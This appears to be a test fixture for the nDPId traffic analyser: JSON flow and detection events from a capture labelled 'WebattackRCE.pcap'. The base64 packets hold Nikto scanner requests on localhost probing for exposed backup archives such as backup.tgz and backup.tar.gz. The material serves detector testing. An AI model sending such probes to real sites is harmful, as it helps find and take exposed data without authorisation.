-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277222,"pkt":"AAAAAAAAAAAAAAAACABFAADCu\/NAAEAGgEB\/AAABfwAAAcQ6H5D46YNpMAqH8IAYAED+tgAAAQEICp1m\/Q6dZv0OR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277224,"pkt":"AAAAAAAAAAAAAAAACABFAADCyzFAAEAGcQJ\/AAABfwAAAcQ8H5A0R\/O25IFzRIAYAED+tgAAAQEICp1m\/RCdZv0PR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277225,"pkt":"AAAAAAAAAAAAAAAACABFAAC90OxAAEAGa0x\/AAABfwAAAcQ+H5C1k+hxPtlM+IAYAED+sQAAAQEICp1m\/RGdZv0RR0VUIC8wLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277228,"pkt":"AAAAAAAAAAAAAAAACABFAAC9wfFAAEAGekd\/AAABfwAAAcRAH5ChSfl1EHb5\/IAYAED+sQAAAQEICp1m\/RSdZv0UR0VUIC8wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277229,"pkt":"AAAAAAAAAAAAAAAACABFAADB75lAAEAGTJt\/AAABfwAAAcRCH5BYYNcNJ8u6iIAYAED+tQAAAQEICp1m\/RWdZv0VR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277231,"pkt":"AAAAAAAAAAAAAAAACABFAADB77xAAEAGTHh\/AAABfwAAAcREH5CTV9cik40gf4AYAED+tQAAAQEICp1m\/RedZv0WR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277232,"pkt":"AAAAAAAAAAAAAAAACABFAADB9\/xAAEAGRDh\/AAABfwAAAcRGH5CWhs9n6ph7xIAYAED+tQAAAQEICp1m\/RidZv0YR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277233,"pkt":"AAAAAAAAAAAAAAAACABFAADB+aZAAEAGQo5\/AAABfwAAAcRIH5BuH8E5NSGMTIAYAED+tQAAAQEICp1m\/RmdZv0ZR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
-01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277235,"pkt":"AAAAAAAAAAAAAAAACABFAADF6elAAEAGUkd\/AAABfwAAAcRKH5Ao6tF83Ul6FYAYAED+uQAAAQEICp1m\/RudZv0aR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":353,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277235,"flow_last_seen":1576420277235,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277235,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50250,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277236,"pkt":"AAAAAAAAAAAAAAAACABFAADFYRdAAEAG2xl\/AAABfwAAAcRMH5CsR1mJC42rtYAYAED+uQAAAQEICp1m\/RydZv0cR0VUIC9iYWNrdXAudGFyLmd6IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":354,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277236,"flow_last_seen":1576420277236,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277236,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50252,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277237,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/lsZAAEAGpXB\/AAABfwAAAcROH5CjIq5axoK2IoAYAED+swAAAQEICp1m\/R2dZv0dR0VUIC8xMjcuYWx6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
-01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":355,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277237,"flow_last_seen":1576420277237,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277237,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50254,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 